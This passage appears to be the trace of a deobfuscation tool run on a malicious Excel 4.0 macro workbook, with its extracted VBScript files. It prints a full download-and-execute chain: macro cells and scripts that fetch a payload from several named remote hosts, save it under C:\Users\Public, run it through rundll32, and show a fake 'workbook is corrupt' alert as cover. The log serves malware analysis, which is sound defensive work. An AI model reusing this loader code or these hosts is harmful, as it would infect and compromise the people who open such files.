  283. CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  284. CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  285. CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  286. CELL:ID13925 , FullEvaluation , [FALSE]
  287. CELL:ID13926 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
  288. CELL:ID13927 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
  289. CELL:ID13928 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
  290. CELL:ID13929 , FullEvaluation , IF(R13927C238<40000,,GOTO(R13940C238))
  291. CELL:ID13930 , FullEvaluation , "https://loughturnperceidrin.ml/wp-keys.php"
  292. CELL:ID13931 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://loughturnperceidrin.ml/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  293. CELL:ID13932 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
  294. CELL:ID13933 , FullBranching , IF(ISERROR(R13932C238),GOTO(R13939C238),)
  295. CELL:ID13933 , FullEvaluation , [FALSE]
  296. CELL:ID13934 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
  297. CELL:ID13935 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
  298. CELL:ID13936 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
  299. CELL:ID13937 , FullEvaluation , IF(R13935C238<40000,,GOTO(R13940C238))
  300. CELL:ID13938 , FullEvaluation , "https://joliroomlides.tk/wp-keys.php"
  301. CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  302. CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  303. CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  304. CELL:FX20053 , FullEvaluation , [FALSE] GOTO(R47050C49)
  305. CELL:AW47050 , FullEvaluation , "=""C:\Users\Public\Clmu.html"""
  306. CELL:AW47051 , FullEvaluation , "=""C:\Users\Public\yP20iC8.vbs"""
  307. CELL:AW47052 , FullEvaluation , "=FOPEN(R2837C133,3)"
  308. CELL:AW47053 , FullEvaluation , "=FWRITELN(R2838C133,""whEoqhq = """"https://thepsaokhue.com/wp-keys.php"""""")"
  309. CELL:AW47054 , FullEvaluation , "=FWRITELN(R2838C133,""hiH = """"https://metagro.com.br/wp-keys.php"""""")"
  310. CELL:AW47055 , FullEvaluation , "=FWRITELN(R2838C133,""MQcR = """"https://loughturnperceidrin.ml/wp-keys.php"""""")"
  311. CELL:AW47056 , FullEvaluation , "=FWRITELN(R2838C133,""Ui5zK = """"https://joliroomlides.tk/wp-keys.php"""""")"
  312. CELL:AW47057 , FullEvaluation , "=FWRITELN(R2838C133,""u4d = Array(whEoqhq,hiH,MQcR,Ui5zK)"")"
  313. CELL:AW47058 , FullEvaluation , "=FWRITELN(R2838C133,""Dim YB0zXti: Set YB0zXti = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")"
  314. CELL:AW47059 , FullEvaluation , "=FWRITELN(R2838C133,""Function m987(data):"")"
  315. CELL:AW47060 , FullEvaluation , "=FWRITELN(R2838C133,""YB0zXti.setOption(2) = 13056"")"
  316. CELL:AW47061 , FullEvaluation , "=FWRITELN(R2838C133,""YB0zXti.Open """"GET"""", data, False"")"
  317. CELL:AW47062 , FullEvaluation , "=FWRITELN(R2838C133,""YB0zXti.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")"
  318. CELL:AW47063 , FullEvaluation , "=FWRITELN(R2838C133,""YB0zXti.Send"")"
  319. CELL:AW47064 , FullEvaluation , "=FWRITELN(R2838C133,""m987 = YB0zXti.Status"")"
  320. CELL:AW47065 , FullEvaluation , "=FWRITELN(R2838C133,""End Function"")"
  321. CELL:AW47066 , FullEvaluation , "=FWRITELN(R2838C133,""For Each G2lS in u4d"")"
  322. CELL:AW47067 , FullEvaluation , "=FWRITELN(R2838C133,""If m987(G2lS) = 200 Then"")"
  323. CELL:AW47068 , FullEvaluation , "=FWRITELN(R2838C133,""Dim Txq2NpoZ: Set Txq2NpoZ = CreateObject(""""ADODB.Stream"""")"")"
  324. CELL:AW47069 , FullEvaluation , "=FWRITELN(R2838C133,""Txq2NpoZ.Open"")"
  325. CELL:AW47070 , FullEvaluation , "=FWRITELN(R2838C133,""Txq2NpoZ.Type = 1"")"
  326. CELL:AW47071 , FullEvaluation , "=FWRITELN(R2838C133,""Txq2NpoZ.Write YB0zXti.ResponseBody"")"
  327. CELL:AW47072 , FullEvaluation , "=FWRITELN(R2838C133,""Txq2NpoZ.SaveToFile """"""&R2836C133&"""""", 2"")"
  328. CELL:AW47073 , FullEvaluation , "=FWRITELN(R2838C133,""Txq2NpoZ.Close"")"
  329. CELL:AW47074 , FullEvaluation , "=FWRITELN(R2838C133,""Exit For"")"
  330. CELL:AW47075 , FullEvaluation , "=FWRITELN(R2838C133,""End If"")"
  331. CELL:AW47076 , FullEvaluation , "=FWRITELN(R2838C133,""Next"")"
  332. CELL:AW47077 , FullEvaluation , "=FCLOSE(R2838C133)"
  333. CELL:AW47078 , FullEvaluation , "=EXEC(""explorer.exe ""&R2837C133&"""")"
  334. CELL:AW47079 , FullEvaluation , "=WHILE(ISERROR(FILES(R2836C133)))"
  335. CELL:AW47080 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  336. CELL:AW47081 , FullEvaluation , "=NEXT()"
  337. CELL:AW47082 , FullEvaluation , "=FILE.DELETE(R2837C133)"
  338. CELL:AW47083 , FullEvaluation , "=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")"
  339. CELL:AW47084 , FullEvaluation , "=""C:\Users\Public\ZCC9G.vbs"""
  340. CELL:AW47085 , FullEvaluation , "=FOPEN(R2870C133,3)"
  341. CELL:AW47086 , FullEvaluation , "=""rundll32.exe"""
  342. CELL:AW47087 , FullEvaluation , "=R2836C133&"",DllRegisterServer"""
  343. CELL:AW47088 , FullEvaluation , "=""C:\Windows\System32"""
  344. CELL:AW47089 , FullEvaluation , "=FWRITELN(R2871C133,""Set vvaK = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")"
  345. CELL:AW47090 , FullEvaluation , "=FWRITELN(R2871C133,""vvaK.Document.Application.ShellExecute """"""&R2872C133&"""""",""""""&R2873C133&"""""",""""""&R2874C133&"""""",Null,0"")"
  346. CELL:AW47091 , FullEvaluation , "=FCLOSE(R2871C133)"
  347. CELL:AW47092 , FullEvaluation , "=EXEC(""explorer.exe ""&R2870C133&"""")"
  348. CELL:AW47093 , FullEvaluation , "=GOTO(R20022C180)"
  349. CELL:AW47094 , FullEvaluation , ON.TIME(2020-06-22 11:29:18.429305,'rtNGOD1P843zMOPdOj'!DG874)
  350. CELL:DG874 , FullEvaluation , FORMULA("=FORMULA(R[46175]C[-62],R[1961]C[22])",rtNGOD1P843zMOPdOj$DG$875:$DG$918)
  351. CELL:DG875 , FullEvaluation , FORMULA("=""C:\Users\Public\Clmu.html""",R[1961]C[22])
  352. CELL:DG876 , FullEvaluation , FORMULA("=""C:\Users\Public\yP20iC8.vbs""",R[1961]C[22])
  353. CELL:DG877 , FullEvaluation , FORMULA("=FOPEN(R2837C133,3)",R[1961]C[22])
  354. CELL:DG878 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""whEoqhq = """"https://thepsaokhue.com/wp-keys.php"""""")",R[1961]C[22])
  355. CELL:DG879 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""hiH = """"https://metagro.com.br/wp-keys.php"""""")",R[1961]C[22])
  356. CELL:DG880 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""MQcR = """"https://loughturnperceidrin.ml/wp-keys.php"""""")",R[1961]C[22])
  357. CELL:DG881 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Ui5zK = """"https://joliroomlides.tk/wp-keys.php"""""")",R[1961]C[22])
  358. CELL:DG882 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""u4d = Array(whEoqhq,hiH,MQcR,Ui5zK)"")",R[1961]C[22])
  359. CELL:DG883 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Dim YB0zXti: Set YB0zXti = CreateObject(""""MSXML2.ServerXMLHTTP.6.0"""")"")",R[1961]C[22])
  360. CELL:DG884 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Function m987(data):"")",R[1961]C[22])
  361. CELL:DG885 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""YB0zXti.setOption(2) = 13056"")",R[1961]C[22])
  362. CELL:DG886 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""YB0zXti.Open """"GET"""", data, False"")",R[1961]C[22])
  363. CELL:DG887 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""YB0zXti.setRequestHeader """"User-Agent"""", """"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"""""")",R[1961]C[22])
  364. CELL:DG888 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""YB0zXti.Send"")",R[1961]C[22])
  365. CELL:DG889 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""m987 = YB0zXti.Status"")",R[1961]C[22])
  366. CELL:DG890 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""End Function"")",R[1961]C[22])
  367. CELL:DG891 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""For Each G2lS in u4d"")",R[1961]C[22])
  368. CELL:DG892 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""If m987(G2lS) = 200 Then"")",R[1961]C[22])
  369. CELL:DG893 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Dim Txq2NpoZ: Set Txq2NpoZ = CreateObject(""""ADODB.Stream"""")"")",R[1961]C[22])
  370. CELL:DG894 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Txq2NpoZ.Open"")",R[1961]C[22])
  371. CELL:DG895 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Txq2NpoZ.Type = 1"")",R[1961]C[22])
  372. CELL:DG896 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Txq2NpoZ.Write YB0zXti.ResponseBody"")",R[1961]C[22])
  373. CELL:DG897 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Txq2NpoZ.SaveToFile """"""&R2836C133&"""""", 2"")",R[1961]C[22])
  374. CELL:DG898 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Txq2NpoZ.Close"")",R[1961]C[22])
  375. CELL:DG899 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Exit For"")",R[1961]C[22])
  376. CELL:DG900 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""End If"")",R[1961]C[22])
  377. CELL:DG901 , FullEvaluation , FORMULA("=FWRITELN(R2838C133,""Next"")",R[1961]C[22])
  378. CELL:DG902 , FullEvaluation , FORMULA("=FCLOSE(R2838C133)",R[1961]C[22])
  379. CELL:DG903 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R2837C133&"""")",R[1961]C[22])
  380. CELL:DG904 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R2836C133)))",R[1961]C[22])
  381. CELL:DG905 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[1961]C[22])
  382. CELL:DG906 , FullEvaluation , FORMULA("=NEXT()",R[1961]C[22])
  383. CELL:DG907 , FullEvaluation , FORMULA("=FILE.DELETE(R2837C133)",R[1961]C[22])
  384. CELL:DG908 , FullEvaluation , FORMULA("=ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt."")",R[1961]C[22])
  385. CELL:DG909 , FullEvaluation , FORMULA("=""C:\Users\Public\ZCC9G.vbs""",R[1961]C[22])
  386. CELL:DG910 , FullEvaluation , FORMULA("=FOPEN(R2870C133,3)",R[1961]C[22])
  387. CELL:DG911 , FullEvaluation , FORMULA("=""rundll32.exe""",R[1961]C[22])
  388. CELL:DG912 , FullEvaluation , FORMULA("=R2836C133&"",DllRegisterServer""",R[1961]C[22])
  389. CELL:DG913 , FullEvaluation , FORMULA("=""C:\Windows\System32""",R[1961]C[22])
  390. CELL:DG914 , FullEvaluation , FORMULA("=FWRITELN(R2871C133,""Set vvaK = GetObject(""""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"""")"")",R[1961]C[22])
  391. CELL:DG915 , FullEvaluation , FORMULA("=FWRITELN(R2871C133,""vvaK.Document.Application.ShellExecute """"""&R2872C133&"""""",""""""&R2873C133&"""""",""""""&R2874C133&"""""",Null,0"")",R[1961]C[22])
  392. CELL:DG916 , FullEvaluation , FORMULA("=FCLOSE(R2871C133)",R[1961]C[22])
  393. CELL:DG917 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R2870C133&"""")",R[1961]C[22])
  394. CELL:DG918 , FullEvaluation , FORMULA("=GOTO(R20022C180)",R[1961]C[22])
  395. CELL:DG919 , FullEvaluation , ON.TIME(2020-06-22 11:29:18.454290,'rtNGOD1P843zMOPdOj'!EC2836)
  396. CELL:EC2836 , FullEvaluation , "C:\Users\Public\Clmu.html"
  397. CELL:EC2837 , FullEvaluation , "C:\Users\Public\yP20iC8.vbs"
  398. CELL:EC2838 , FullEvaluation , FOPEN("C:\Users\Public\yP20iC8.vbs",3)
  399. CELL:EC2839 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","whEoqhq = ""https://thepsaokhue.com/wp-keys.php""")
  400. CELL:EC2840 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","hiH = ""https://metagro.com.br/wp-keys.php""")
  401. CELL:EC2841 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","MQcR = ""https://loughturnperceidrin.ml/wp-keys.php""")
  402. CELL:EC2842 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Ui5zK = ""https://joliroomlides.tk/wp-keys.php""")
  403. CELL:EC2843 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","u4d = Array(whEoqhq,hiH,MQcR,Ui5zK)")
  404. CELL:EC2844 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Dim YB0zXti: Set YB0zXti = CreateObject(""MSXML2.ServerXMLHTTP.6.0"")")
  405. CELL:EC2845 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Function m987(data):")
  406. CELL:EC2846 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","YB0zXti.setOption(2) = 13056")
  407. CELL:EC2847 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","YB0zXti.Open ""GET"", data, False")
  408. CELL:EC2848 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","YB0zXti.setRequestHeader ""User-Agent"", ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)""")
  409. CELL:EC2849 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","YB0zXti.Send")
  410. CELL:EC2850 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","m987 = YB0zXti.Status")
  411. CELL:EC2851 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","End Function")
  412. CELL:EC2852 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","For Each G2lS in u4d")
  413. CELL:EC2853 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","If m987(G2lS) = 200 Then")
  414. CELL:EC2854 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Dim Txq2NpoZ: Set Txq2NpoZ = CreateObject(""ADODB.Stream"")")
  415. CELL:EC2855 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Txq2NpoZ.Open")
  416. CELL:EC2856 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Txq2NpoZ.Type = 1")
  417. CELL:EC2857 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Txq2NpoZ.Write YB0zXti.ResponseBody")
  418. CELL:EC2858 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Txq2NpoZ.SaveToFile ""C:\Users\Public\Clmu.html"", 2")
  419. CELL:EC2859 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Txq2NpoZ.Close")
  420. CELL:EC2860 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Exit For")
  421. CELL:EC2861 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","End If")
  422. CELL:EC2862 , FullEvaluation , FWRITE("C:\Users\Public\yP20iC8.vbs","Next")
  423. CELL:EC2863 , PartialEvaluation , FCLOSE("C:\Users\Public\yP20iC8.vbs")
  424. CELL:EC2864 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\yP20iC8.vbs")
  425. CELL:EC2865 , PartialEvaluation , WHILE(ISERROR(FILES(R2836C133)))
  426. CELL:EC2868 , PartialEvaluation , FILE.DELETE("C:\Users\Public\yP20iC8.vbs")
  427. CELL:EC2869 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.")
  428. CELL:EC2870 , FullEvaluation , "C:\Users\Public\ZCC9G.vbs"
  429. CELL:EC2871 , FullEvaluation , FOPEN("C:\Users\Public\ZCC9G.vbs",3)
  430. CELL:EC2872 , FullEvaluation , "rundll32.exe"
  431. CELL:EC2873 , FullEvaluation , "C:\Users\Public\Clmu.html,DllRegisterServer"
  432. CELL:EC2874 , FullEvaluation , "C:\Windows\System32"
  433. CELL:EC2875 , FullEvaluation , FWRITE("C:\Users\Public\ZCC9G.vbs","Set vvaK = GetObject(""new:C08AFD90-F2A1-11D1-8455-00A0C91F3880"")")
  434. CELL:EC2876 , FullEvaluation , FWRITE("C:\Users\Public\ZCC9G.vbs","vvaK.Document.Application.ShellExecute ""rundll32.exe"",""C:\Users\Public\Clmu.html,DllRegisterServer"",""C:\Windows\System32"",Null,0")
  435. CELL:EC2877 , PartialEvaluation , FCLOSE("C:\Users\Public\ZCC9G.vbs")
  436. CELL:EC2878 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\ZCC9G.vbs")
  437. CELL:EC2879 , FullEvaluation , GOTO(R20022C180)
  438. CELL:FX20022 , End , CLOSE(FALSE)
  439. CELL:FX20032 , FullEvaluation , [FALSE] GOTO(R20022C180)
  440. CELL:FX20022 , End , CLOSE(FALSE)
  441.  
  442. Files:
  443.  
  444. Files: path C:\Users\Public\Oyi.vbs, access 3
  445. On Error Resume Next
  446. Set fqaeA = CreateObject("WScript.Shell")
  447. Set YtU9AS = CreateObject("Scripting.FileSystemObject")
  448. Set pZ93bgn = YtU9AS.CreateTextFile("C:\Users\Public\a8FML.txt", True)
  449. pZ93bgn.WriteLine(fqaeA.RegRead("HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings"))
  450. pZ93bgn.Close
  451.  
  452.  
  453. Files: path C:\Users\Public\yP20iC8.vbs, access 3
  454. whEoqhq = "https://thepsaokhue.com/wp-keys.php"
  455. hiH = "https://metagro.com.br/wp-keys.php"
  456. MQcR = "https://loughturnperceidrin.ml/wp-keys.php"
  457. Ui5zK = "https://joliroomlides.tk/wp-keys.php"
  458. u4d = Array(whEoqhq,hiH,MQcR,Ui5zK)
  459. Dim YB0zXti: Set YB0zXti = CreateObject("MSXML2.ServerXMLHTTP.6.0")
  460. Function m987(data):
  461. YB0zXti.setOption(2) = 13056
  462. YB0zXti.Open "GET", data, False
  463. YB0zXti.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
  464. YB0zXti.Send
  465. m987 = YB0zXti.Status
  466. End Function
  467. For Each G2lS in u4d
  468. If m987(G2lS) = 200 Then
  469. Dim Txq2NpoZ: Set Txq2NpoZ = CreateObject("ADODB.Stream")
  470. Txq2NpoZ.Open
  471. Txq2NpoZ.Type = 1
  472. Txq2NpoZ.Write YB0zXti.ResponseBody
  473. Txq2NpoZ.SaveToFile "C:\Users\Public\Clmu.html", 2
  474. Txq2NpoZ.Close
  475. Exit For
  476. End If
  477. Next
  478.  
  479.  
  480. Files: path C:\Users\Public\ZCC9G.vbs, access 3
  481. Set vvaK = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
  482. vvaK.Document.Application.ShellExecute "rundll32.exe","C:\Users\Public\Clmu.html,DllRegisterServer","C:\Windows\System32",Null,0
  483.  
  484.  
  485. [END of Deobfuscation]
  486. time elapsed: 4.536201238632202
  487.  
  488. Process finished with exit code 0